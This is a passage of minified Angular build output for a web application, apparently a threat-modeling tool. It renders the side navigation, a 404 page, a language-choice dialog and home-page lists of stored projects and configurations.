nu-item","",3,"disabled","click"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"click",4,"ngIf"],["mat-menu-item","",3,"matMenuTriggerFor"],["languages","matMenu"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["messages","matMenu"],[2,"margin-left","7px","margin-right","23px",3,"icon"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div"),s(3,"\n    "),m(4,"button",1),he("click",function(){return i.OnClick("/home")})("mouseenter",function(){return i.OnMouseEnter("/home")})("mouseleave",function(){return i.OnMouseLeave()}),oe(5,"translate"),s(6,"\n      "),m(7,"button",2),s(8,"\n        "),m(9,"mat-icon"),s(10,"home"),u(),s(11,"\n      "),u(),s(12,"\n    "),u(),s(13,"\n  "),u(),s(14,"\n  "),m(15,"div"),s(16,"\n    "),m(17,"button",3),he("click",function(){return i.OnClick("/dashboard")})("mouseenter",function(){return i.OnMouseEnter("/dashboard")})("mouseleave",function(){return i.OnMouseLeave()}),oe(18,"translate"),s(19,"\n      "),m(20,"button",2),s(21,"\n        "),m(22,"mat-icon"),s(23,"assessment"),u(),s(24," \n      "),u(),s(25,"\n    "),u(),s(26,"\n  "),u(),s(27,"\n  "),m(28,"div"),s(29,"\n    "),m(30,"button",4),he("click",function(){return i.OnClick("/modeling")})("mouseenter",function(){return i.OnMouseEnter("/modeling")})("mouseleave",function(){return i.OnMouseLeave()}),oe(31,"translate"),s(32,"\n      "),m(33,"button",2),s(34,"\n        "),m(35,"mat-icon"),s(36,"architecture"),u(),s(37," \n      "),u(),s(38,"\n    "),u(),s(39,"\n  "),u(),s(40,"\n  "),m(41,"div"),s(42,"\n    "),m(43,"button",5),he("click",function(){return i.OnClick("/risk")})("mouseenter",function(){return i.OnMouseEnter("/risk")})("mouseleave",function(){return i.OnMouseLeave()}),oe(44,"translate"),s(45,"\n      "),m(46,"button",2),s(47,"\n        "),m(48,"mat-icon"),s(49,"crisis_alert"),u(),s(50," \n      "),u(),s(51,"\n    "),u(),s(52,"\n  "),u(),s(53,"\n  "),m(54,"div"),s(55,"\n    "),m(56,"button",6),he("click",function(){return i.OnClick("/mitigation")})("mouseenter",function(){return i.OnMouseEnter("/mitigation")})("mouseleave",function(){return i.OnMouseLeave()}),oe(57,"translate"),s(58,"\n      "),m(59,"button",2),s(60,"\n        "),m(61,"mat-icon"),s(62,"security"),u(),s(63," \n      "),u(),s(64,"\n    "),u(),s(65,"\n  "),u(),s(66,"\n  "),m(67,"div"),s(68,"\n    "),m(69,"button",7),he("click",function(){return i.OnClick("/reporting")})("mouseenter",function(){return i.OnMouseEnter("/reporting")})("mouseleave",function(){return i.OnMouseLeave()}),oe(70,"translate"),s(71,"\n      "),m(72,"button",2),s(73,"\n        "),m(74,"mat-icon"),s(75,"receipt_long"),u(),s(76," \n      "),u(),s(77,"\n    "),u(),s(78,"\n  "),u(),s(79,"\n  "),m(80,"div"),s(81,"\n    "),m(82,"button",8),he("click",function(){return i.OnClick("/configuration")})("mouseenter",function(){return i.OnMouseEnter("/configuration")})("mouseleave",function(){return i.OnMouseLeave()}),oe(83,"translate"),s(84,"\n      "),m(85,"button",2),s(86,"\n        "),m(87,"mat-icon"),s(88,"settings"),u(),s(89," \n      "),u(),s(90,"\n    "),u(),s(91,"\n  "),u(),s(92,"\n\n  "),m(93,"div",9),s(94,"\n    "),m(95,"div",10),he("mouseenter",function(){return i.OnMouseEnter("/settings")})("mouseleave",function(){return i.OnMouseLeave()}),oe(96,"translate"),s(97,"\n      "),m(98,"button",11),s(99,"\n        "),m(100,"mat-icon",12),s(101,"account_circle"),u(),s(102,"\n      "),u(),s(103,"\n      "),m(104,"mat-menu",13,14),s(106,"\n        "),m(107,"button",15),s(108,"\n          "),m(109,"mat-icon"),s(110,"login"),u(),s(111,"\n          "),m(112,"span"),s(113),oe(114,"translate"),u(),s(115,"\n        "),u(),s(116,"\n        "),m(117,"button",16),he("click",function(){return i.dataService.LogOut()}),s(118,"\n          "),m(119,"mat-icon"),s(120,"logout"),u(),s(121,"\n          "),m(122,"span"),s(123),oe(124,"translate"),u(),s(125,"\n        "),u(),s(126,"\n        "),m(127,"button",17),he("click",function(){return i.Clear()}),s(128,"\n          "),m(129,"mat-icon"),s(130,"clear"),u(),s(131,"\n          "),m(132,"span"),s(133),oe(134,"translate"),u(),s(135,"\n        "),u(),s(136,"\n        "),m(137,"button",17),he("click",function(){return i.ResetLayout()}),s(138,"\n          "),m(139,"mat-icon"),s(140,"grid_view"),u(),s(141,"\n          "),m(142,"span"),s(143),oe(144,"translate"),u(),s(145,"\n        "),u(),s(146,"\n        "),m(147,"button",17),he("click",function(){return i.OpenCookieConsent()}),s(148,"\n          "),m(149,"mat-icon"),s(150,"cookie"),u(),s(151,"\n          "),m(152,"span"),s(153),oe(154,"translate"),u(),s(155,"\n        "),u(),s(156,"\n        "),ne(157,act,7,2,"button",18),s(158,"\n        "),ne(159,nct,9,3,"button",18),s(160,"\n        "),ne(161,oct,9,3,"button",18),s(162,"\n        "),m(163,"button",19),s(164,"\n          "),m(165,"mat-icon"),s(166,"language"),u(),s(167,"\n          "),m(168,"span"),s(169,"Languages"),u(),s(170,"\n        "),u(),s(171,"\n        "),m(172,"button",19),s(173,"\n          "),m(174,"mat-icon"),s(175,"speaker_notes_off"),u(),s(176,"\n          "),m(177,"span"),s(178),oe(179,"translate"),u(),s(180,"\n        "),u(),s(181,"\n        "),m(182,"button",17),he("click",function(){return i.OpenYouTubePlaylist()}),s(183,"\n          "),m(184,"mat-icon"),s(185,"video_library"),u(),s(186,"\n          "),m(187,"span"),s(188),oe(189,"translate"),u(),s(190,"\n        "),u(),s(191,"\n        "),m(192,"button",17),he("click",function(){return i.OpenGlossary()}),s(193,"\n          "),m(194,"mat-icon"),s(195,"menu_book"),u(),s(196,"\n          "),m(197,"span"),s(198),oe(199,"translate"),u(),s(200,"\n        "),u(),s(201,"\n      "),u(),s(202,"\n      "),m(203,"mat-menu",null,20),s(205,"\n        "),m(206,"button",21),s(207,"\n          "),m(208,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.dataService.HasSpellCheck=r})("click",function(r){return r.stopPropagation()}),s(209),oe(210,"translate"),u(),s(211,"\n        "),u(),s(212,"\n        "),m(213,"button",17),he("click",function(){return i.ChangeLanguage("en")}),s(214,"English"),u(),s(215,"\n        "),m(216,"button",17),he("click",function(){return i.ChangeLanguage("de")}),s(217,"Deutsch"),u(),s(218,"\n      "),u(),s(219,"\n      "),m(220,"mat-menu",null,23),s(222,"\n        "),m(223,"button",21),s(224,"\n          "),m(225,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowErrors=r})("click",function(r){return r.stopPropagation()}),s(226),oe(227,"translate"),u(),s(228,"\n        "),u(),s(229,"\n        "),m(230,"button",21),s(231,"\n          "),m(232,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowWarnings=r})("click",function(r){return r.stopPropagation()}),s(233),oe(234,"translate"),u(),s(235,"\n        "),u(),s(236,"\n        "),m(237,"button",21),s(238,"\n          "),m(239,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowSuccesses=r})("click",function(r){return r.stopPropagation()}),s(240),oe(241,"translate"),u(),s(242,"\n        "),u(),s(243,"\n        "),m(244,"button",21),s(245,"\n          "),m(246,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowInfos=r})("click",function(r){return r.stopPropagation()}),s(247),oe(248,"translate"),u(),s(249,"\n        "),u(),s(250,"\n        "),m(251,"button",21),s(252,"\n          "),m(253,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowUnsavedChanges=r})("click",function(r){return r.stopPropagation()}),s(254),oe(255,"translate"),u(),s(256,"\n        "),u(),s(257,"\n      "),u(),s(258,"\n    "),u(),s(259,"\n  "),u(),s(260,"\n"),it(261,"div"),u()),2&e){const n=Ti(105),r=Ti(204),c=Ti(221);Ct("bg-color-light1",!i.theme.IsDarkMode)("bg-color-dark1",i.theme.IsDarkMode),C(4),Ct("btn-selected-light",i.IsSelected("/home"))("btn-selected-dark",i.IsSelected("/home",!0)),at("matTooltip",re(5,147,"side-nav.home")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/home"))("icon-selected-dark",i.IsHoveredOrSelected("/home",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/dashboard"))("btn-selected-dark",i.IsSelected("/dashboard",!0)),at("matTooltip",re(18,149,"side-nav.dashboard")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/dashboard"))("icon-selected-dark",i.IsHoveredOrSelected("/dashboard",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/modeling"))("btn-selected-dark",i.IsSelected("/modeling",!0)),at("matTooltip",re(31,151,"side-nav.modeling")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/modeling"))("icon-selected-dark",i.IsHoveredOrSelected("/modeling",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/risk"))("btn-selected-dark",i.IsSelected("/risk",!0)),at("matTooltip",re(44,153,"side-nav.risk")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/risk"))("icon-selected-dark",i.IsHoveredOrSelected("/risk",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/mitigation"))("btn-selected-dark",i.IsSelected("/mitigation",!0)),at("matTooltip",re(57,155,"side-nav.mitigation")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/mitigation"))("icon-selected-dark",i.IsHoveredOrSelected("/mitigation",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/reporting"))("btn-selected-dark",i.IsSelected("/reporting",!0)),at("matTooltip",re(70,157,"side-nav.reporting")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/reporting"))("icon-selected-dark",i.IsHoveredOrSelected("/reporting",!0)),C(8),Ct("disabled",!i.dataService.IsLoggedIn&&!i.dataService.IsGuest)("btn-selected-light",i.IsSelected("/configuration"))("btn-selected-dark",i.IsSelected("/configuration",!0)),at("matTooltip",re(83,159,"side-nav.configuration")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/configuration"))("icon-selected-dark",i.IsHoveredOrSelected("/configuration",!0)),C(8),Ct("btn-selected-light",i.IsSelected("/settings"))("btn-selected-dark",i.IsSelected("/settings",!0)),at("matTooltip",re(96,161,"side-nav.account")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),V("matMenuTriggerFor",n),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/settings"))("icon-selected-dark",i.IsHoveredOrSelected("/settings",!0)),C(13),ke(re(114,163,"side-nav.login")),C(4),V("disabled",!i.dataService.IsLoggedIn),C(6),ke(re(124,165,"side-nav.logout")),C(10),ke(re(134,167,"side-nav.resetDefault")),C(10),ke(re(144,169,"side-nav.resetLayout")),C(10),ke(re(154,171,"side-nav.cookieConsent")),C(4),V("ngIf",i.dataService.IsLoggedIn),C(2),V("ngIf",i.theme.IsDarkMode),C(2),V("ngIf",!i.theme.IsDarkMode),C(2),V("matMenuTriggerFor",r),C(9),V("matMenuTriggerFor",c),C(6),ke(re(179,173,"side-nav.messages")),C(10),ke(re(189,175,"side-nav.YouTubePlaylist")),C(10),ke(re(199,177,"side-nav.Glossary")),C(10),V("ngModel",i.dataService.HasSpellCheck),C(1),ct("\n            ",re(210,179,"side-nav.spellCheck"),"\n          "),C(16),V("ngModel",i.messagesService.ShowErrors),C(1),ct("\n            ",re(227,181,"general.Error"),"\n          "),C(6),V("ngModel",i.messagesService.ShowWarnings),C(1),ct("\n            ",re(234,183,"general.Warning"),"\n          "),C(6),V("ngModel",i.messagesService.ShowSuccesses),C(1),ct("\n            ",re(241,185,"general.Success"),"\n          "),C(6),V("ngModel",i.messagesService.ShowInfos),C(1),ct("\n            ",re(248,187,"general.Info"),"\n          "),C(6),V("ngModel",i.messagesService.ShowUnsavedChanges),C(1),ct("\n            ",re(255,189,"messages.UnsavedChanges"),"\n          ")}},dependencies:[Ri,x1,Ta,Ea,tH,qq,oa,da,Xo,qo,po,Pa,Mg,Xi],styles:[".sidenav-icon-button[_ngcontent-%COMP%]{text-transform:uppercase;text-decoration:none;background:transparent;padding:5px;display:inline-block;border:none}.sidenav-icon-button[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]{width:36px!important;height:36px!important;line-height:36px!important}.sidenav-icon-button[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{width:24px!important;height:24px!important;line-height:24px!important}.sidenav-icon-button[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]   .material-icons[_ngcontent-%COMP%]{font-size:24px!important}.btn-light[_ngcontent-%COMP%]{color:#00000080}.btn-dark[_ngcontent-%COMP%]{color:#ffffff80}.btn-selected-light[_ngcontent-%COMP%]{border-left-color:#000;border-left-style:solid;border-left-width:2px}.btn-selected-dark[_ngcontent-%COMP%]{border-left-color:#fff;border-left-style:solid;border-left-width:2px}.icon-selected-light[_ngcontent-%COMP%]{color:#000}.icon-selected-dark[_ngcontent-%COMP%]{color:#fff}.disabled[_ngcontent-%COMP%]{pointer-events:none}"]}),t})(),rct=(()=>{class t{constructor(e){this.theme=e}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa))},t.\u0275cmp=Wt({type:t,selectors:[["app-page-not-found"]],decls:19,vars:4,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],[2,"width","100%","height","100%"],[2,"text-align","center"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),it(6,"app-side-nav",3),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"h1",4),s(12,"404 - Page not found"),u(),s(13,"\n    "),u(),s(14,"\n  "),u(),s(15,"\n  "),it(16,"app-status-bar"),s(17,"\n"),u(),s(18,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode))},dependencies:[_u,gu,Nd,pf,_f],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})(),sct=(()=>{class t{constructor(e,i){this.translateService=e,this.locStorage=i}ngOnInit(){}ChangeLanguage(e){this.translateService.use(e),this.locStorage.Set(si.LANGUAGE,e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Sn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-language-dialog"]],decls:14,vars:0,consts:[["mat-dialog-title",""],["align","center"],["mat-button","","mat-dialog-close","","cdkFocusInitial","",3,"click"],["mat-button","","mat-dialog-close","",3,"click"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1,"Hi \u{1f44b}\u{1f3fc}"),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n  Choose your language \u{1f310}\n"),u(),s(5,"\n"),m(6,"mat-dialog-actions",1),s(7,"\n  "),m(8,"button",2),he("click",function(){return i.ChangeLanguage("en")}),s(9,"Welcome!"),u(),s(10,"\n  "),m(11,"button",3),he("click",function(){return i.ChangeLanguage("de")}),s(12,"Willkommen!"),u(),s(13,"\n"),u())},dependencies:[da,vm,Am,Tm,Em]}),t})();function cct(t,a){if(1&t){const e=Ye();m(0,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.ExchangeConfig(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.name)}}function lct(t,a){if(1&t&&(m(0,"div",45),s(1),oe(2,"translate"),it(3,"br"),s(4,"\n              "),u()),2&t){const e=B(2);C(1),za("\n                ",re(2,2,"pages.home.CurrentProject"),": ",e.dataService.SelectedFile.name,"\n                ")}}function dct(t,a){if(1&t){const e=Ye();m(0,"button",46),he("click",function(){return be(e),Me(B(2).dataService.OnNewProject())}),s(1,"\n                "),m(2,"mat-icon",47),s(3,"add_circle"),u(),s(4),oe(5,"translate"),u()}2&t&&(C(4),ct("\n                ",re(5,1,"pages.home.createProject"),"\n              "))}function mct(t,a){1&t&&(m(0,"button",48),s(1,"\n                "),m(2,"mat-icon",47),s(3,"add_circle"),u(),s(4),oe(5,"translate"),u()),2&t&&(B(),V("matMenuTriggerFor",Ti(131)),C(4),ct("\n                ",re(5,2,"pages.home.createProject"),"\n              "))}function uct(t,a){if(1&t){const e=Ye();m(0,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnNewProject(r))}),s(1,"\n                  "),m(2,"mat-icon"),s(3),u(),s(4,"\n                  "),m(5,"span"),s(6),u(),s(7,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(2);C(3),ke(i.GetFileIcon(e)),C(3),ke(e.name)}}function hct(t,a){1&t&&(m(0,"mat-icon",55),oe(1,"translate"),s(2,"edit_off"),u()),2&t&&at("matTooltip",re(1,1,"pages.home.notWritable"))}function fct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",49),s(3,"\n                  "),m(4,"mat-icon",50),oe(5,"translate"),s(6,"cloud_queue"),u(),s(7,"\n                  "),m(8,"button",42),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n                  "),m(11,"span",51),s(12),u(),s(13," \n                  "),ne(14,hct,3,3,"mat-icon",52),s(15,"\n                  "),m(16,"button",53),oe(17,"translate"),s(18,"\n                    "),m(19,"mat-icon"),s(20,"more_vert"),u(),s(21,"\n                  "),u(),s(22,"\n                  "),m(23,"mat-menu",null,54),s(25,"\n                    "),m(26,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OpenRepo(r))}),s(27,"\n                      "),m(28,"mat-icon"),s(29,"open_in_new"),u(),s(30,"\n                      "),m(31,"span"),s(32),oe(33,"translate"),u(),s(34,"\n                    "),u(),s(35,"\n                    "),m(36,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.DeleteFile(r))}),s(37,"\n                      "),m(38,"mat-icon"),s(39,"delete"),u(),s(40,"\n                      "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n                    "),u(),s(45,"\n                  "),u(),s(46,"\n                "),u(),s(47,"\n              "),Mt()}if(2&t){const e=a.$implicit,i=Ti(24),n=B(2);C(4),at("matTooltip",re(5,9,"pages.home.storedOnline")),C(5),ke(e.name),C(2),at("matTooltip",n.GetRepoName(e)),C(1),ct("in ",n.CutName(n.GetRepoName(e)),""),C(2),V("ngIf",n.IsProtected(e)),C(2),at("matTooltip",re(17,11,"general.More")),V("matMenuTriggerFor",i),C(16),ke(re(33,13,"general.openInNew")),C(10),ke(re(43,15,"general.Delete"))}}function pct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",56),he("page",function(n){return be(e),Me(B(2).pageGHProjectIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=B(2);V("length",e.dataService.AvailableGHProjects.length)("pageSize",e.pageProjectSize)("hidePageSize",!0)}}function _ct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",49),s(3,"\n                  "),m(4,"mat-icon",50),oe(5,"translate"),s(6,"file_present"),u(),s(7,"\n                  "),m(8,"button",42),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n                  "),m(11,"span",51),s(12),u(),s(13,"\n                  "),m(14,"button",53),oe(15,"translate"),s(16,"\n                    "),m(17,"mat-icon"),s(18,"more_vert"),u(),s(19,"\n                  "),u(),s(20,"\n                  "),m(21,"mat-menu",null,57),s(23,"\n                    "),m(24,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.RemoveFSFile(r))}),s(25,"\n                      "),m(26,"mat-icon"),s(27,"remove"),u(),s(28,"\n                      "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n                    "),u(),s(33,"\n                    "),m(34,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.DeleteFile(r))}),s(35,"\n                      "),m(36,"mat-icon"),s(37,"delete"),u(),s(38,"\n                      "),m(39,"span"),s(40),oe(41,"translate"),u(),s(42,"\n                    "),u(),s(43,"\n                  "),u(),s(44,"\n                "),u(),s(45,"\n              "),Mt()}if(2&t){const e=a.$implicit,i=Ti(22),n=B(2);C(4),at("matTooltip",re(5,8,"pages.home.storedOffline")),C(5),ke(n.dataService.GetFileName(e.path)),C(2),at("matTooltip",n.dataService.GetFilePath(e.path)),C(1),ct("in ",n.CutName(n.dataService.GetFilePath(e.path)),""),C(2),at("matTooltip",re(15,10,"general.More")),V("matMenuTriggerFor",i),C(16),ke(re(31,12,"general.Remove")),C(10),ke(re(41,14,"general.Delete"))}}function gct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",56),he("page",function(n){return be(e),Me(B(2).pageFSProjectIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=B(2);V("length",e.dataService.AvailableFSProjects.length)("pageSize",e.pageProjectSize)("hidePageSize",!0)}}function Cct(t,a){1&t&&(m(0,"mat-icon",55),oe(1,"translate"),s(2,"edit_off"),u()),2&t&&at("matTooltip",re(1,1,"pages.home.notWritable"))}function yct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",58),s(3,"\n                  "),m(4,"mat-icon",50),oe(5,"translate"),s(6,"cloud_queue"),u(),s(7,"\n                  "),m(8,"button",42),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n                  "),m(11,"span",59),s(12),u(),s(13,"\n                  "),ne(14,Cct,3,3,"mat-icon",52),s(15,"\n                  "),m(16,"button",53),oe(17,"translate"),s(18,"\n                    "),m(19,"mat-icon"),s(20,"more_vert"),u(),s(21,"\n                  "),u(),s(22,"\n                  "),m(23,"mat-menu",null,60),s(25,"\n                    "),m(26,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OpenRepo(r))}),s(27,"\n                      "),m(28,"mat-icon"),s(29,"open_in_new"),u(),s(30,"\n                      "),m(31,"span"),s(32),oe(33,"translate"),u(),s(34,"\n                    "),u(),s(35,"\n                    "),m(36,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.DeleteFile(r))}),s(37,"\n                      "),m(38,"mat-icon"),s(39,"delete"),u(),s(40,"\n                      "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n                    "),u(),s(45,"\n                  "),u(),s(46,"\n                "),u(),s(47,"\n              "),Mt()}if(2&t){const e=a.$implicit,i=Ti(24),n=B(2);C(4),at("matTooltip",re(5,8,"pages.home.storedOnline")),C(5),ke(e.name),C(3),ct("in ",n.GetRepoName(e),""),C(2),V("ngIf",n.IsProtected(e)),C(2),at("matTooltip",re(17,10,"general.More")),V("matMenuTriggerFor",i),C(16),ke(re(33,12,"general.openInNew")),C(10),ke(re(43,14,"general.Delete"))}}function bct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",56),he("page",function(n){return be(e),Me(B(2).pageGHConfigIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=B(2);V("length",e.dataService.AvailableGHConfigs.length)("pageSize",e.pageConfigSize)("hidePageSize",!0)}}function Mct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",58),s(3,"\n                  "),m(4,"mat-icon",50),oe(5,"translate"),s(6,"file_present"),u(),s(7,"\n                  "),m(8,"button",42),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n                  "),m(11,"span",51),s(12),u(),s(13,"\n                  "),m(14,"button",53),oe(15,"translate"),s(16,"\n                    "),m(17,"mat-icon"),s(18,"more_vert"),u(),s(19,"\n                  "),u(),s(20,"\n                  "),m(21,"mat-menu",null,61),s(23,"\n                    "),m(24,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.RemoveFSFile(r))}),s(25,"\n                      "),m(26,"mat-icon"),s(27,"remove"),u(),s(28,"\n                      "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n                    "),u(),s(33,"\n                    "),m(34,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.DeleteFile(r))}),s(35,"\n                      "),m(36,"mat-icon"),s(37,"delete"),u(),s(38,"\n                      "),m(39,"span"),s(40),oe(41,"translate"),u(),s(42,"\n                    "),u(),s(43,"\n                  "),u(),s(44,"\n                "),u(),s(45,"\n              "),Mt()}if(2&t){const e=a.$implicit,i=Ti(22),n=B(2);C(4),at("matTooltip",re(5,8,"pages.home.storedOffline")),C(5),ke(n.dataService.GetFileName(e.path)),C(2),at("matTooltip",n.dataService.GetFilePath(e.path)),C(1),ct("in ",n.CutName(n.dataService.GetFilePath(e.path)),""),C(2),at("matTooltip",re(15,10,"general.More")),V("matMenuTriggerFor",i),C(16),ke(re(31,12,"general.Remove")),C(10),ke(re(41,14,"general.Delete"))}}function vct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",56),he("page",function(n){return be(e),Me(B(2).pageFSConfigIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=B(2);V("length",e.dataService.AvailableFSConfigs.length)("pageSize",e.pageConfigSize)("hidePageSize",!0)}}function Act(t,a){1&t&&(bt(0),s(1,"\n                  "),it(2,"br"),s(3,"\n                  "),m(4,"mat-icon",62),s(5,"install_desktop"),u(),s(6,"\n                  "),m(7,"a",63),s(8),oe(9,"translate"),u(),s(10,"\n                "),Mt()),2&t&&(C(8),ke(re(9,1,"pages.home.downloadDesktop")))}function Tct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"h2"),s(3),oe(4,"translate"),m(5,"button",18),s(6,"\n                  "),m(7,"mat-icon"),s(8,"more_vert"),u(),s(9,"\n                